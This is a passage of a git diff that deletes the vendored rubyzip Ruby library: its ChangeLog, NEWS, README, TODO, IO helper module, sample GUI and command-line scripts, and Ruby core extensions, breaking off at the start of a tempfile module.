-	  entry
-
-	* TODO: [no log message]
-
-	* TODO, zip.rb, ziptest.rb: Unit test calling ZipFile.extract with
-	  block
-
-2002-03-18 21:06  thomas
-
-	* TODO: [no log message]
-
-	* zip.rb, ziptest.rb: ZipFile#commit now reinitializes ZipFile.
-
-	* TODO, zip.rb, ziptest.rb: Refactoring:
-	  
-	  Collapsed ZipEntry and ZipStreamableZipEntry into ZipEntry.
-	  
-	  Collapsed BasicZipFile and ZipFile into ZipFile.
-
-	* zip.rb: Removed method that was never called
-
-2002-03-17 22:33  thomas
-
-	* TODO: [no log message]
-
-	* ziptest.rb: Run tests with =true as default
-
-	* NEWS, TODO, zip.rb, ziptest.rb: Now runs with -w switch without
-	  warnings
-
-	* .cvsignore: [no log message]
-
-	* zip.rb, ziptest.rb: Down to one failing test
-
-	* zip.rb, ziptest.rb: [no log message]
-
-	* TODO, zip.rb, ziptest.rb: [no log message]
-
-2002-02-25 19:42  thomas
-
-	* TODO: Added more todos
-
-2002-02-23 15:51  thomas
-
-	* zip.rb: [no log message]
-
-	* zip.rb, ziptest.rb: [no log message]
-
-	* zip.rb, ziptest.rb: [no log message]
-
-2002-02-03 18:47  thomas
-
-	* ziptest.rb: [no log message]
-
-2002-02-02 15:58  thomas
-
-	* example.rb, zip.rb, ziptest.rb: [no log message]
-
-	* .cvsignore: [no log message]
-
-	* example.rb, zip.rb, ziptest.rb: Renamed SimpleZipFile to
-	  BasicZipFile
-
-	* TODO: [no log message]
-
-	* ziptest.rb: More test cases - all of them failing, so now there
-	  are 18 failing test cases. Three more test cases to implement,
-	  then it is time for the production code
-
-2002-02-01 21:49  thomas
-
-	* ziptest.rb: [no log message]
-
-	* ziptest.rb: Also run SimpleZipFile tests for ZipFile.
-
-	* example.rb, zip.rb, ziptest.rb: ZipFile renamed to SimpleZipFile.
-	  The new ZipFile will have many more methods that are useful for
-	  managing archives.
-
-2002-01-29 20:30  thomas
-
-	* TODO: [no log message]
-
-2002-01-26 00:18  thomas
-
-	* NEWS: [no log message]
-
-	* ziptest.rb: In unit test: work around ruby/cygwin weirdness. You
-	  get an Errno::EEXISTS instead of an Errno::EISDIR if you try to
-	  open a file for writing that is a directory.
-
-	* ziptest.rb: Fixed test that failed on windows because of CRLF
-	  line ending
-
-2002-01-25 23:58  thomas
-
-	* ziptest.rb: [no log message]
-
-	* .cvsignore, example.rb, zip.rb: Fixed bug reading from empty
-	  deflated entry in zip file
-
-	* .cvsignore: [no log message]
-
-	* ziptest.rb: [no log message]
-
-	* NEWS, README.txt, zip.rb, ziptest.rb: Zip write support is now
-	  fully functional in the form of ZipOutputStream.
-
-	* zip.rb, ziptest.rb: [no log message]
-
-	* zip.rb, ziptest.rb: [no log message]
-
-2002-01-20 16:00  thomas
-
-	* zip.rb, ziptest.rb: Added Deflater and DeflaterTest.
-
-	* .cvsignore: [no log message]
-
-	* .cvsignore: Added .cvsignore file
-
-	* zip.rb, ziptest.rb: Added ZipEntry.writeCDirEntry and misc minor
-	  fixes
-
-2002-01-19 23:28  thomas
-
-	* example.rb, zip.rb, ziptest.rb: NOTICE: Not all tests run!!
-	  
-	  ZipOutputStream in progress
-	  
-	  Wrapped rubyzip in namespace module Zip.
-
-2002-01-17 18:52  thomas
-
-	* ziptest.rb: Fail nicely if the user doesn't have info-zip
-	  compatible zip in the path
-
-2002-01-10 18:02  thomas
-
-	* zip.rb: Adjusted chunk size to 32k after a few perf measurements
-
-2002-01-09 22:10  thomas
-
-	* README.txt: License now same as rubys, not just GPL
-
-2002-01-06 00:19  thomas
-
-	* README.txt: [no log message]
-
-2002-01-05 23:09  thomas
-
-	* NEWS, README.txt, NEWS: Updated NEWS file
-
-	* README.txt, zip.rb, ziptest.rb, zlib.c.diff: Added tests for
-	  decompressors and a tests for ZipLocalEntry,
-	  ZipCentralDirectoryEntry and ZipCentralDirectory for handling of
-	  corrupt data
-
-	* file1.txt.deflatedData: deflated data extracted from a zip file.
-	  contains file1.txt
-
-	* zip.rb: Changed references to Inflate to Zlib::inflate for
-	  compatibility with ruby-zlib-0.5
-
-	* README.txt, zip.rb, ziptest.rb: [no log message]
-
-	* example.rb, NEWS: [no log message]
-
-	* COPYING, README.txt: [no log message]
-
-	* ziptest.rb: Fixed problem with test file creation
-
-	* README.txt: Updated README.txt
-
-	* zip.rb, ziptest.rb: ZipFile now works
-
-2002-01-04 21:51  thomas
-
-	* testDirectory.bin, zip.rb, ziptest.rb:
-	  ZipCentralDirectoryEntryTest now runs
-
-	* ziptest.rb: Changed
-	  ZIpLocalNEtryTest::test_ReadLocalEntryHeaderOfFirstTestZipEntry
-	  so it works on both unix too. It only worked on windows because
-	  the test made assumptions about the compressed size and crc of an
-	  entry, but that differs depending on the OS because of the CRLF
-	  thing.
-
-	* README.txt: Added note about zlib.c patch
-
-2002-01-02 18:48  thomas
-
-	* README.txt, example.rb, file1.txt, zip.rb, ziptest.rb,
-	  zlib.c.diff: initial
-
-	* README.txt, example.rb, file1.txt, zip.rb, ziptest.rb,
-	  zlib.c.diff: Initial revision
-
diff --git a/lib/zip/NEWS b/lib/zip/NEWS
deleted file mode 100644
index a72956fd69..0000000000
--- a/lib/zip/NEWS
+++ /dev/null
@@ -1,162 +0,0 @@
-= Version 0.9.4
-
-Changed ZipOutputStream.put_next_entry signature (API CHANGE!). Now
-allows comment, extra field and compression method to be specified.
-
-= Version 0.9.3
-
-Fixed: Added ZipEntry::name_encoding which retrieves the character
-encoding of the name and comment of the entry. Also added convenience
-methods ZipEntry::name_in(enc) and ZipEntry::comment_in(enc) for
-getting zip entry names and comments in a specified character
-encoding.
-
-= Version 0.9.2
-
-Fixed: Renaming an entry failed if the entry's new name was a
-different length than its old name. (Diego Barros)
-
-= Version 0.9.1
-
-Added symlink support and support for unix file permissions. Reduced
-memory usage during decompression.
-
-New methods ZipFile::[follow_symlinks, restore_times, restore_permissions, restore_ownership].
-New methods ZipEntry::unix_perms, ZipInputStream::eof?.
-Added documentation and test for new ZipFile::extract.
-Added some of the API suggestions from sf.net #1281314.
-Applied patch for sf.net bug #1446926.
-Applied patch for sf.net bug #1459902.
-Rework ZipEntry and delegate classes.
-
-= Version 0.5.12
-
-Fixed problem with writing binary content to a ZipFile in MS Windows.
-
-= Version 0.5.11
-
-Fixed name clash file method copy_stream from fileutils.rb. Fixed
-problem with references to constant CHUNK_SIZE.
-ZipInputStream/AbstractInputStream read is now buffered like ruby IO's
-read method, which means that read and gets etc can be mixed. The
-unbuffered read method has been renamed to sysread.
-
-= Version 0.5.10
-
-Fixed method name resolution problem with FileUtils::copy_stream and
-IOExtras::copy_stream.
-
-= Version 0.5.9
-
-Fixed serious memory consumption issue
-
-= Version 0.5.8
-
-Fixed install script.
-
-= Version 0.5.7
-
-install.rb no longer assumes it is being run from the toplevel source
-dir. Directory structure changed to reflect common ruby library
-project structure. Migrated from RubyUnit to Test::Unit format.  Now
-uses Rake to build source packages and gems and run unit tests.
-
-= Version 0.5.6
-
-Fix for FreeBSD 4.9 which returns Errno::EFBIG instead of
-Errno::EINVAL for some invalid seeks. Fixed 'version needed to
-extract'-field incorrect in local headers.
-
-= Version 0.5.5
-
-Fix for a problem with writing zip files that concerns only ruby 1.8.1.
-
-= Version 0.5.4
-
-Significantly reduced memory footprint when modifying zip files.
-
-= Version 0.5.3
-
-Added optimization to avoid decompressing and recompressing individual
-entries when modifying a zip archive.
-
-= Version 0.5.2
-
-Fixed ZipFile corruption bug in ZipFile class. Added basic unix
-extra-field support.
-
-= Version 0.5.1
-
-Fixed ZipFile.get_output_stream bug.
-
-= Version 0.5.0
-
-List of changes:
-* Ruby 1.8.0 and ruby-zlib 0.6.0 compatibility
-* Changed method names from camelCase to rubys underscore style. 
-* Installs to zip/ subdir instead of directly to site_ruby
-* Added ZipFile.directory and ZipFile.file - each method return an
-object that can be used like Dir and File only for the contents of the
-zip file. 
-* Added sample application zipfind which works like Find.find, only
-Zip::ZipFind.find traverses into zip archives too.
-
-Bug fixes:
-* AbstractInputStream.each_line with non-default separator
-
-
-= Version 0.5.0a
-
-Source reorganized. Added ziprequire, which can be used to load ruby
-modules from a zip file, in a fashion similar to jar files in
-Java. Added gtkRubyzip, another sample application. Implemented
-ZipInputStream.lineno and ZipInputStream.rewind
-
-Bug fixes: 
-
-* Read and write date and time information correctly for zip entries. 
-* Fixed read() using separate buffer, causing mix of gets/readline/read to
-cause problems. 
-
-= Version 0.4.2
-
-Performance optimizations. Test suite runs in half the time.
-
-= Version 0.4.1
-
-Windows compatibility fixes.
-
-= Version 0.4.0
-
-Zip::ZipFile is now mutable and provides a more convenient way of
-modifying zip archives than Zip::ZipOutputStream. Operations for
-adding, extracting, renaming, replacing and removing entries to zip
-archives are now available.
-
-Runs without warnings with -w switch.
-
-Install script install.rb added.
-
-
-= Version 0.3.1
-
-Rudimentary support for writing zip archives.
-
-
-= Version 0.2.2
-
-Fixed and extended unit test suite. Updated to work with ruby/zlib
-0.5. It doesn't work with earlier versions of ruby/zlib.
-
-
-= Version 0.2.0
-
-Class ZipFile added. Where ZipInputStream is used to read the
-individual entries in a zip file, ZipFile reads the central directory
-in the zip archive, so you can get to any entry in the zip archive
-without having to skipping through all the preceeding entries.
-
-
-= Version 0.1.0
-
-First working version of ZipInputStream.
diff --git a/lib/zip/README b/lib/zip/README
deleted file mode 100644
index 79546e0b34..0000000000
--- a/lib/zip/README
+++ /dev/null
@@ -1,72 +0,0 @@
-= rubyzip
-
-rubyzip is a ruby library for reading and writing zip files.
-
-= Install
-
-If you have rubygems you can install rubyzip directly from the gem
-repository
-
-  gem install rubyzip
-
-Otherwise obtain the source (see below) and run
-
-  ruby install.rb
-
-To run the unit tests you need to have test::unit installed
-
-  rake test
-
-
-= Documentation
-
-There is more than one way to access or create a zip archive with
-rubyzip. The basic API is modeled after the classes in
-java.util.zip from the Java SDK. This means there are classes such
-as Zip::ZipInputStream, Zip::ZipOutputStream and
-Zip::ZipFile. Zip::ZipInputStream provides a basic interface for
-iterating through the entries in a zip archive and reading from the
-entries in the same way as from a regular File or IO
-object. ZipOutputStream is the corresponding basic output
-facility. Zip::ZipFile provides a mean for accessing the archives
-central directory and provides means for accessing any entry without
-having to iterate through the archive. Unlike Java's
-java.util.zip.ZipFile rubyzip's Zip::ZipFile is mutable, which means
-it can be used to change zip files as well.
-
-Another way to access a zip archive with rubyzip is to use rubyzip's
-Zip::ZipFileSystem API. Using this API files can be read from and
-written to the archive in much the same manner as ruby's builtin
-classes allows files to be read from and written to the file system.
-
-rubyzip also features the
-zip/ziprequire.rb[link:files/lib/zip/ziprequire_rb.html] module which
-allows ruby to load ruby modules from zip archives.
-
-For details about the specific behaviour of classes and methods refer
-to the test suite. Finally you can generate the rdoc documentation or
-visit http://rubyzip.sourceforge.net.
-
-= License
-
-rubyzip is distributed under the same license as ruby. See
-http://www.ruby-lang.org/en/LICENSE.txt
-
-
-= Website and Project Home
-
-http://rubyzip.sourceforge.net
-
-http://sourceforge.net/projects/rubyzip
-
-== Download (tarballs and gems)
-
-http://sourceforge.net/project/showfiles.php?group_id=43107&package_id=35377
-
-= Authors
-
-Thomas Sondergaard (thomas at sondergaard.cc)
-
-Technorama Ltd. (oss-ruby-zip at technorama.net)
-
-extra-field support contributed by Tatsuki Sugiura (sugi at nemui.org)
\ No newline at end of file
diff --git a/lib/zip/TODO b/lib/zip/TODO
deleted file mode 100644
index e24cde5779..0000000000
--- a/lib/zip/TODO
+++ /dev/null
@@ -1,16 +0,0 @@
-
-* ZipInputStream: Support zip-files with trailing data descriptors
-* Adjust rdoc stylesheet to advertise inherited methods if possible
-* Suggestion: Add ZipFile/ZipInputStream example that demonstrates extracting all entries.
-* Suggestion: ZipFile#extract destination should default to "."
-* Suggestion: ZipEntry should have extract(), get_input_stream() methods etc
-* SUggestion: ZipInputStream/ZipOutputStream should accept an IO object in addition to a filename.
-* (is buffering used anywhere with write?)
-* Inflater.sysread should pass the buffer to produce_input.
-* Implement ZipFsDir.glob
-* ZipFile.checkIntegrity method
-* non-MSDOS permission attributes
-** See mail from Ned Konz to ruby-talk subj. "Re: SV: [ANN] Archive 0.2"
-* Packager version, required unpacker version in zip headers
-** See mail from Ned Konz to ruby-talk subj. "Re: SV: [ANN] Archive 0.2"
-* implement storing attributes and ownership information
diff --git a/lib/zip/ioextras.rb b/lib/zip/ioextras.rb
deleted file mode 100644
index c611535791..0000000000
--- a/lib/zip/ioextras.rb
+++ /dev/null
@@ -1,165 +0,0 @@
-module IOExtras  #:nodoc:
-
-  CHUNK_SIZE = 131072
-
-  RANGE_ALL = 0..-1
-
-  def self.copy_stream(ostream, istream)
-    s = ''
-    ostream.write(istream.read(CHUNK_SIZE, s)) until istream.eof? 
-  end
-
-  def self.copy_stream_n(ostream, istream, nbytes)
-    s = ''
-    toread = nbytes
-    while (toread > 0 && ! istream.eof?) 
-      tr = toread > CHUNK_SIZE ? CHUNK_SIZE : toread
-      ostream.write(istream.read(tr, s))
-      toread -= tr
-    end 
-  end
-
-
-  # Implements kind_of? in order to pretend to be an IO object
-  module FakeIO
-    def kind_of?(object)
-      object == IO || super
-    end
-  end
-
-  # Implements many of the convenience methods of IO
-  # such as gets, getc, readline and readlines 
-  # depends on: input_finished?, produce_input and read
-  module AbstractInputStream  
-    include Enumerable
-    include FakeIO
-
-    def initialize
-      super
-      @lineno = 0
-      @outputBuffer = ""
-    end
-
-    attr_accessor :lineno
-
-    def read(numberOfBytes = nil, buf = nil)
-      tbuf = nil
-
-      if @outputBuffer.length > 0
-        if numberOfBytes <= @outputBuffer.length
-          tbuf = @outputBuffer.slice!(0, numberOfBytes)
-        else
-          numberOfBytes -= @outputBuffer.length if (numberOfBytes)
-          rbuf = sysread(numberOfBytes, buf)
-          tbuf = @outputBuffer
-          tbuf << rbuf if (rbuf)
-          @outputBuffer = ""
-        end
-      else
-        tbuf = sysread(numberOfBytes, buf)
-      end
-
-      return nil unless (tbuf)
-
-      if buf
-        buf.replace(tbuf)
-      else
-        buf = tbuf
-      end
-
-      buf
-    end
-
-    def readlines(aSepString = $/)
-      retVal = []
-      each_line(aSepString) { |line| retVal << line }
-      return retVal
-    end
-    
-    def gets(aSepString=$/)
-      @lineno = @lineno.next
-      return read if aSepString == nil
-      aSepString="#{$/}#{$/}" if aSepString == ""
-      
-      bufferIndex=0
-      while ((matchIndex = @outputBuffer.index(aSepString, bufferIndex)) == nil)
-  bufferIndex=@outputBuffer.length
-  if input_finished?
-    return @outputBuffer.empty? ? nil : flush 
-  end
-  @outputBuffer << produce_input
-      end
-      sepIndex=matchIndex + aSepString.length
-      return @outputBuffer.slice!(0...sepIndex)
-    end
-    
-    def flush
-      retVal=@outputBuffer
-      @outputBuffer=""
-      return retVal
-    end
-    
-    def readline(aSepString = $/)
-      retVal = gets(aSepString)
-      raise EOFError if retVal == nil
-      return retVal
-    end
-    
-    def each_line(aSepString = $/)
-      while true
-  yield readline(aSepString)
-      end
-    rescue EOFError
-    end
-    
-    alias_method :each, :each_line
-  end
-
-
-  # Implements many of the output convenience methods of IO.
-  # relies on <<
-  module AbstractOutputStream 
-    include FakeIO
-
-    def write(data)
-      self << data
-      data.to_s.length
-    end
-
-
-    def print(*params)
-      self << params.join << $\.to_s
-    end
-
-    def printf(aFormatString, *params)
-      self << sprintf(aFormatString, *params)
-    end
-
-    def putc(anObject)
-      self << case anObject
-        when Fixnum then anObject.chr
-        when String then anObject
-        else raise TypeError, "putc: Only Fixnum and String supported"
-        end
-      anObject
-    end
-    
-    def puts(*params)
-      params << "\n" if params.empty?
-      params.flatten.each {
-  |element|
-  val = element.to_s
-  self << val
-  self << "\n" unless val[-1,1] == "\n"
-      }
-    end
-
-  end
-
-end # IOExtras namespace module
-
-
-
-# Copyright (C) 2002-2004 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/samples/example.rb b/lib/zip/samples/example.rb
deleted file mode 100755
index 741afa765e..0000000000
--- a/lib/zip/samples/example.rb
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/env ruby
-
-$: << "../lib"
-system("zip example.zip example.rb gtkRubyzip.rb")
-
-require 'zip/zip'
-
-####### Using ZipInputStream alone: #######
-
-Zip::ZipInputStream.open("example.zip") {
-  |zis|
-  entry = zis.get_next_entry
-  print "First line of '#{entry.name} (#{entry.size} bytes):  "
-  puts "'#{zis.gets.chomp}'"
-  entry = zis.get_next_entry
-  print "First line of '#{entry.name} (#{entry.size} bytes):  "
-  puts "'#{zis.gets.chomp}'"
-}
-
-
-####### Using ZipFile to read the directory of a zip file: #######
-
-zf = Zip::ZipFile.new("example.zip")
-zf.each_with_index {
-  |entry, index|
-  
-  puts "entry #{index} is #{entry.name}, size = #{entry.size}, compressed size = #{entry.compressed_size}"
-  # use zf.get_input_stream(entry) to get a ZipInputStream for the entry
-  # entry can be the ZipEntry object or any object which has a to_s method that
-  # returns the name of the entry.
-}
-
-
-####### Using ZipOutputStream to write a zip file: #######
-
-Zip::ZipOutputStream.open("exampleout.zip") {
-  |zos|
-  zos.put_next_entry("the first little entry")
-  zos.puts "Hello hello hello hello hello hello hello hello hello"
-
-  zos.put_next_entry("the second little entry")
-  zos.puts "Hello again"
-
-  # Use rubyzip or your zip client of choice to verify
-  # the contents of exampleout.zip
-}
-
-####### Using ZipFile to change a zip file: #######
-
-Zip::ZipFile.open("exampleout.zip") {
-  |zf|
-  zf.add("thisFile.rb", "example.rb")
-  zf.rename("thisFile.rb", "ILikeThisName.rb")
-  zf.add("Again", "example.rb")
-}
-
-# Lets check
-Zip::ZipFile.open("exampleout.zip") {
-  |zf|
-  puts "Changed zip file contains: #{zf.entries.join(', ')}"
-  zf.remove("Again")
-  puts "Without 'Again': #{zf.entries.join(', ')}"
-}
-
-# For other examples, look at zip.rb and ziptest.rb
-
-# Copyright (C) 2002 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/samples/example_filesystem.rb b/lib/zip/samples/example_filesystem.rb
deleted file mode 100755
index 0cacbd2aa2..0000000000
--- a/lib/zip/samples/example_filesystem.rb
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env ruby
-
-$: << "../lib"
-
-require 'zip/zipfilesystem'
-
-EXAMPLE_ZIP = "filesystem.zip"
-
-File.delete(EXAMPLE_ZIP) if File.exists?(EXAMPLE_ZIP)
-
-Zip::ZipFile.open(EXAMPLE_ZIP, Zip::ZipFile::CREATE) {
-  |zf|
-  zf.file.open("file1.txt", "w") { |os| os.write "first file1.txt" }
-  zf.dir.mkdir("dir1")
-  zf.dir.chdir("dir1")
-  zf.file.open("file1.txt", "w") { |os| os.write "second file1.txt" }
-  puts zf.file.read("file1.txt")
-  puts zf.file.read("../file1.txt")
-  zf.dir.chdir("..")
-  zf.file.open("file2.txt", "w") { |os| os.write "first file2.txt" }
-  puts "Entries:                   #{zf.entries.join(', ')}"
-}
-
-Zip::ZipFile.open(EXAMPLE_ZIP) {
-  |zf|
-  puts "Entries from reloaded zip: #{zf.entries.join(', ')}"
-}
-
-# For other examples, look at zip.rb and ziptest.rb
-
-# Copyright (C) 2003 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/samples/gtkRubyzip.rb b/lib/zip/samples/gtkRubyzip.rb
deleted file mode 100755
index 0b63485d5b..0000000000
--- a/lib/zip/samples/gtkRubyzip.rb
+++ /dev/null
@@ -1,86 +0,0 @@
-#!/usr/bin/env ruby
-
-$: << "../lib"
-
-$VERBOSE = true
-
-require 'gtk'
-require 'zip/zip'
-
-class MainApp < Gtk::Window
-  def initialize
-    super()
-    set_usize(400, 256)
-    set_title("rubyzip")
-    signal_connect(Gtk::Window::SIGNAL_DESTROY) { Gtk.main_quit }
-
-    box = Gtk::VBox.new(false, 0)
-    add(box)
-
-    @zipfile = nil
-    @buttonPanel = ButtonPanel.new
-    @buttonPanel.openButton.signal_connect(Gtk::Button::SIGNAL_CLICKED) {
-      show_file_selector
-    }
-    @buttonPanel.extractButton.signal_connect(Gtk::Button::SIGNAL_CLICKED) {
-      puts "Not implemented!"
-    }
-    box.pack_start(@buttonPanel, false, false, 0)
-    
-    sw = Gtk::ScrolledWindow.new
-    sw.set_policy(Gtk::POLICY_AUTOMATIC, Gtk::POLICY_AUTOMATIC)
-    box.pack_start(sw, true, true, 0)
-
-    @clist = Gtk::CList.new(["Name", "Size", "Compression"])
-    @clist.set_selection_mode(Gtk::SELECTION_BROWSE)
-    @clist.set_column_width(0, 120)
-    @clist.set_column_width(1, 120)
-    @clist.signal_connect(Gtk::CList::SIGNAL_SELECT_ROW) {
-      |w, row, column, event|
-      @selected_row = row
-    }
-    sw.add(@clist)
-  end
-
-  class ButtonPanel < Gtk::HButtonBox
-    attr_reader :openButton, :extractButton
-    def initialize
-      super
-      set_layout(Gtk::BUTTONBOX_START)
-      set_spacing(0)
-      @openButton = Gtk::Button.new("Open archive")
-      @extractButton = Gtk::Button.new("Extract entry")
-      pack_start(@openButton)
-      pack_start(@extractButton)
-    end
-  end
-
-  def show_file_selector
-    @fileSelector = Gtk::FileSelection.new("Open zip file")
-    @fileSelector.show
-    @fileSelector.ok_button.signal_connect(Gtk::Button::SIGNAL_CLICKED) {
-      open_zip(@fileSelector.filename)
-      @fileSelector.destroy
-    }
-    @fileSelector.cancel_button.signal_connect(Gtk::Button::SIGNAL_CLICKED) {
-      @fileSelector.destroy
-    }
-  end
-
-  def open_zip(filename)
-    @zipfile = Zip::ZipFile.open(filename)
-    @clist.clear
-    @zipfile.each { 
-      |entry|
-      @clist.append([ entry.name, 
-          entry.size.to_s, 
-          (100.0*entry.compressedSize/entry.size).to_s+"%" ])
-    }
-  end
-end
-
-mainApp = MainApp.new()
-
-mainApp.show_all
-
-Gtk.main
diff --git a/lib/zip/samples/qtzip.rb b/lib/zip/samples/qtzip.rb
deleted file mode 100755
index 3d76bd18e8..0000000000
--- a/lib/zip/samples/qtzip.rb
+++ /dev/null
@@ -1,101 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE=true
-
-$: << "../lib"
-
-require 'Qt'
-system('rbuic -o zipdialogui.rb zipdialogui.ui')
-require 'zipdialogui.rb'
-require 'zip/zip'
-
-
-
-a = Qt::Application.new(ARGV)
-
-class ZipDialog < ZipDialogUI
-
-
-  def initialize()
-    super()
-    connect(child('add_button'), SIGNAL('clicked()'),
-            self, SLOT('add_files()'))
-    connect(child('extract_button'), SIGNAL('clicked()'),
-            self, SLOT('extract_files()'))
-  end
-
-  def zipfile(&proc)
-    Zip::ZipFile.open(@zip_filename, &proc)
-  end
-
-  def each(&proc)
-    Zip::ZipFile.foreach(@zip_filename, &proc)
-  end
-  
-  def refresh()
-    lv = child("entry_list_view")
-    lv.clear
-    each { 
-      |e|
-      lv.insert_item(Qt::ListViewItem.new(lv, e.name, e.size.to_s))
-    }
-  end
-
-    
-  def load(zipfile)
-    @zip_filename = zipfile
-    refresh
-  end
-
-  def add_files
-    l = Qt::FileDialog.getOpenFileNames(nil, nil, self)
-    zipfile { 
-      |zf| 
-      l.each { 
-        |path|
-        zf.add(File.basename(path), path)
-      }
-    }
-    refresh
-  end
-
-  def extract_files
-    selected_items = []
-    unselected_items = []
-    lv_item = entry_list_view.first_child
-    while (lv_item)
-      if entry_list_view.is_selected(lv_item)
-        selected_items << lv_item.text(0)
-      else
-        unselected_items << lv_item.text(0)
-      end
-      lv_item = lv_item.next_sibling
-    end
-    puts "selected_items.size = #{selected_items.size}"
-    puts "unselected_items.size = #{unselected_items.size}"
-    items = selected_items.size > 0 ? selected_items : unselected_items
-    puts "items.size = #{items.size}"
-
-    d = Qt::FileDialog.get_existing_directory(nil, self)
-    if (!d)
-      puts "No directory chosen"
-    else
-      zipfile { |zf| items.each { |e| zf.extract(e, File.join(d, e)) } }
-    end
-    
-  end
-
-  slots 'add_files()', 'extract_files()'
-end
-
-if !ARGV[0]
-  puts "usage: #{$0} zipname"
-  exit
-end
-
-zd = ZipDialog.new
-zd.load(ARGV[0])
-
-a.mainWidget = zd
-zd.show()
-a.exec()
diff --git a/lib/zip/samples/write_simple.rb b/lib/zip/samples/write_simple.rb
deleted file mode 100755
index 648989a2ca..0000000000
--- a/lib/zip/samples/write_simple.rb
+++ /dev/null
@@ -1,13 +0,0 @@
-#!/usr/bin/env ruby
-
-$: << "../lib"
-
-require 'zip/zip'
-
-include Zip
-
-ZipOutputStream.open('simple.zip') {
-  |zos|
-  ze = zos.put_next_entry 'entry.txt'
-  zos.puts "Hello world"
-}
diff --git a/lib/zip/samples/zipfind.rb b/lib/zip/samples/zipfind.rb
deleted file mode 100755
index 5a9d84ec1c..0000000000
--- a/lib/zip/samples/zipfind.rb
+++ /dev/null
@@ -1,74 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-$: << "../lib"
-
-require 'zip/zip'
-require 'find'
-
-module Zip
-  module ZipFind
-    def self.find(path, zipFilePattern = /\.zip$/i)
-      Find.find(path) {
-  |fileName|
-  yield(fileName)
-  if zipFilePattern.match(fileName)  && File.file?(fileName)
-    begin
-      Zip::ZipFile.foreach(fileName)  {
-        |zipEntry|
-        yield(fileName + File::SEPARATOR + zipEntry.to_s)
-      }
-    rescue Errno::EACCES => ex
-      puts ex
-    end
-  end
-      }
-    end
-
-    def self.find_file(path, fileNamePattern, zipFilePattern = /\.zip$/i)
-      self.find(path, zipFilePattern) {
-  |fileName|
-  yield(fileName) if fileNamePattern.match(fileName)
-      }
-    end
-
-  end
-end
-
-if __FILE__ == $0
-  module ZipFindConsoleRunner
-    
-    PATH_ARG_INDEX = 0;
-    FILENAME_PATTERN_ARG_INDEX = 1;
-    ZIPFILE_PATTERN_ARG_INDEX = 2;
-    
-    def self.run(args)
-      check_args(args)
-      Zip::ZipFind.find_file(args[PATH_ARG_INDEX], 
-          args[FILENAME_PATTERN_ARG_INDEX],
-          args[ZIPFILE_PATTERN_ARG_INDEX]) {
-  |fileName|
-  report_entry_found fileName
-      }
-    end
-    
-    def self.check_args(args)
-      if (args.size != 3)
-  usage
-  exit
-      end
-    end
-
-    def self.usage
-      puts "Usage: #{$0} PATH ZIPFILENAME_PATTERN FILNAME_PATTERN"
-    end
-    
-    def self.report_entry_found(fileName)
-      puts fileName
-    end
-    
-  end
-
-  ZipFindConsoleRunner.run(ARGV)
-end
diff --git a/lib/zip/stdrubyext.rb b/lib/zip/stdrubyext.rb
deleted file mode 100644
index 833365dbca..0000000000
--- a/lib/zip/stdrubyext.rb
+++ /dev/null
@@ -1,111 +0,0 @@
-unless Enumerable.method_defined?(:inject)
-  module Enumerable  #:nodoc:all
-    def inject(n = 0)
-      each { |value| n = yield(n, value) }
-      n
-    end
-  end
-end
-
-module Enumerable #:nodoc:all
-  # returns a new array of all the return values not equal to nil
-  # This implementation could be faster
-  def select_map(&aProc)
-    map(&aProc).reject { |e| e.nil? }
-  end
-end
-
-unless Object.method_defined?(:object_id)
-  class Object  #:nodoc:all
-    # Using object_id which is the new thing, so we need
-    # to make that work in versions prior to 1.8.0
-    alias object_id id
-  end
-end
-
-unless File.respond_to?(:read)
-  class File # :nodoc:all
-    # singleton method read does not exist in 1.6.x
-    def self.read(fileName)
-      open(fileName) { |f| f.read }
-    end
-  end
-end
-
-class String  #:nodoc:all
-  def starts_with(aString)
-    rindex(aString, 0) == 0
-  end
-
-  def ends_with(aString)
-    index(aString, -aString.size)
-  end
-
-  def ensure_end(aString)
-    ends_with(aString) ? self : self + aString
-  end
-
-  def lchop
-    slice(1, length)
-  end
-end
-
-class Time  #:nodoc:all
-  
-  #MS-DOS File Date and Time format as used in Interrupt 21H Function 57H:
-  # 
-  # Register CX, the Time:
-  # Bits 0-4  2 second increments (0-29)
-  # Bits 5-10 minutes (0-59)
-  # bits 11-15 hours (0-24)
-  # 
-  # Register DX, the Date:
-  # Bits 0-4 day (1-31)
-  # bits 5-8 month (1-12)
-  # bits 9-15 year (four digit year minus 1980)
-  
-  
-  def to_binary_dos_time
-    (sec/2) +
-      (min  << 5) +
-      (hour << 11)
-  end
-
-  def to_binary_dos_date
-    (day) +
-      (month << 5) +
-      ((year - 1980) << 9)
-  end
-
-  # Dos time is only stored with two seconds accuracy
-  def dos_equals(other)
-    to_i/2 == other.to_i/2
-  end
-
-  def self.parse_binary_dos_format(binaryDosDate, binaryDosTime)
-    second = 2 * (       0b11111 & binaryDosTime)
-    minute = (     0b11111100000 & binaryDosTime) >> 5 
-    hour   = (0b1111100000000000 & binaryDosTime) >> 11
-    day    = (           0b11111 & binaryDosDate) 
-    month  = (       0b111100000 & binaryDosDate) >> 5
-    year   = ((0b1111111000000000 & binaryDosDate) >> 9) + 1980
-    begin
-      return Time.local(year, month, day, hour, minute, second)
-    end
-  end
-end
-
-class Module  #:nodoc:all
-  def forward_message(forwarder, *messagesToForward)
-    methodDefs = messagesToForward.map { 
-      |msg| 
-      "def #{msg}; #{forwarder}(:#{msg}); end"
-    }
-    module_eval(methodDefs.join("\n"))
-  end
-end
-
-
-# Copyright (C) 2002, 2003 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/tempfile_bugfixed.rb b/lib/zip/tempfile_bugfixed.rb
deleted file mode 100644
index a04c59e2dc..0000000000
--- a/lib/zip/tempfile_bugfixed.rb
+++ /dev/null
@@ -1,195 +0,0 @@
-#
-# tempfile - manipulates temporary files
-#
-# $Id$
-#
-
-require 'delegate'
-require 'tmpdir'
-
-module BugFix  #:nodoc:all
-
-# A class for managing temporary files.  This library is written to be
-# thread safe.
-class Tempfile < DelegateClass(File)
-  MAX_TRY = 10
